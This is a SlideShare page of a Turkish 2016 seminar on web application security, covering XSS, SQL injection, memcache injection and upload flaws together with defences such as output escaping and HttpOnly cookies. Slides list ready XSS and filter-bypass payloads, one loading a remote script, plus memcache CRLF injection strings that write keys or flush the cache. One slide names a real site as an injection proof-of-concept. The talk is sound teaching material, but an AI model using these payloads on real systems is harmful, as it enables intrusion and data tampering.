Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Web Uygulama Güvenliği (Akademik Bilişim 2016)

2 407 vues

Publié le

Akademik Bilişim 2016 etkinliği kapsamında Aydın Adnan Menderes Üniversitesi'nde vermiş olduğum seminerin sunumu.

Publié dans : Internet
  • Soyez le premier à commenter

Web Uygulama Güvenliği (Akademik Bilişim 2016)

  1. 1. Web Uygulama Güvenliği Akademik Bilişim 2016 Ömer Çıtak
  2. 2. #! whoami Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social : @Om3rCitak
  3. 3. #! cat index • Cross-site Scripting (XSS) • SQL Injection • Memcache Injection • Upload Authentication
  4. 4. #! ping-pong.jpg
  5. 5. #! dont-trust-anyone.jpg
  6. 6. #! cross-site-scripting • Reflected XSS • DOM Based XSS • Stored XSS
  7. 7. #! reflected-xss.jpg
  8. 8. #! reflected-xss-poc.jpg
  9. 9. #! dom-based-xss.jpg
  10. 10. #! stored-xss.jpg
  11. 11. #! stored-xss-poc.jpg
  12. 12. #! stored-xss-poc.jpg
  13. 13. #! cat classic-xss-payloads • <script>alert(1)</script> • <img src="javascript:alert('XSS');"> • <IFRAME SRC="javascript:alert('XSS');"></IFRAME> • <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT> • <video src=1 onerror=alert(1)> • <audio src=1 onerror=alert(1)> • <img src=x onerror=alert(1)">
  14. 14. #! cat xss-bypass-payloads • <scrscriptipt>alalertert(1)</scrscriptipt> • alert(String.fromCharCode(88,83,83)) • <IMG SRC=j&#97…………….')> • <IMG SRC='vbscript:msgbox("XSS")'>
  15. 15. #! xss-protection-1.jpg • Strip Tags – http://php.net/manual/tr/function.strip-tags.php
  16. 16. #! xss-protection-2.jpg • HTML Special Chars – http://php.net/manual/tr/function.htmlspecialchars.php
  17. 17. #! xss-protection-3.jpg • HttpOnly Cookies (session_set_cookie_params)
  18. 18. #! xss-protection-4.jpg
  19. 19. #! xss-protection-4.jpg
  20. 20. #! xss-demo.jpg
  21. 21. #! sql-injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  22. 22. #! union-based-sql-injection.jpg
  23. 23. #! sql-injection-login-bypass.jpg
  24. 24. #! cat blind-sql-injection • Ya hatalar gizlenmiş ise? (error_reporting(0)) • Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?
  25. 25. #! blind-sql-injection.jpg Reis Yaradan öbür tarafta sormayacak mı reis neden Blind Injection denemedin diye?
  26. 26. #! blind-sql-injection.jpg
  27. 27. #! blind-sql-injection-poc.jpg
  28. 28. #! blind-sql-injection-poc.jpg
  29. 29. #! cat time-based-sql-injection • Ya arka planda çıktı vermeyen bir query çalışıyor ise? – Count Query – Update Query – Insert Query – Delete Query – Relationship Query
  30. 30. #! time-based-sql-injection.jpg
  31. 31. #! time-based-sql-injection.jpg MySQL Server Microsoft SQL Server Oracle Server
  32. 32. #! sql-injection-poc.jpg Uluslararası Af Örgütü (amnesty.org.tr)
  33. 33. #! sql-injection-poc.jpg
  34. 34. #! sql-injection-demo.jpg
  35. 35. #! memcache-injection
  36. 36. #! using-memcache.jpg
  37. 37. #! phpstorm memcached.php
  38. 38. #! telnet 127.0.0.1 11211 > set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END
  39. 39. #! phpstorm memcached.php
  40. 40. #! phpstorm memcached.php
  41. 41. #! phpstorm memcached.php
  42. 42. #! phpstorm memcached.php
  43. 43. #! phpstorm memcached.php ?key=omer 0 10 6 rn hacked rn • urlencode(‘r’) = %0d • urlencode(‘n’) = %0a ?key=omer 0 10 6 %0d%0a hacked %0d%0a
  44. 44. #! phpstorm memcached.php > set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
  45. 45. #! phpstorm memcached.php ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=aaaaa…(251) flush_all %0d%0a
  46. 46. #! cat vulnerable-libraries Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached
  47. 47. #! cat safe_libraries Python : python-memcache Php : memcache Java : java.net.spy.memcached
  48. 48. #! cat using-memcached-library Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3
  49. 49. #! ascii-table.jpg
  50. 50. #! phpstorm memcached.php
  51. 51. #! upload-authentication
  52. 52. #! upload-authentication-poc
  53. 53. #! wget questions
  54. 54. #! exit Thanks <3 www.omercitak.com Social : @Om3rCitak

×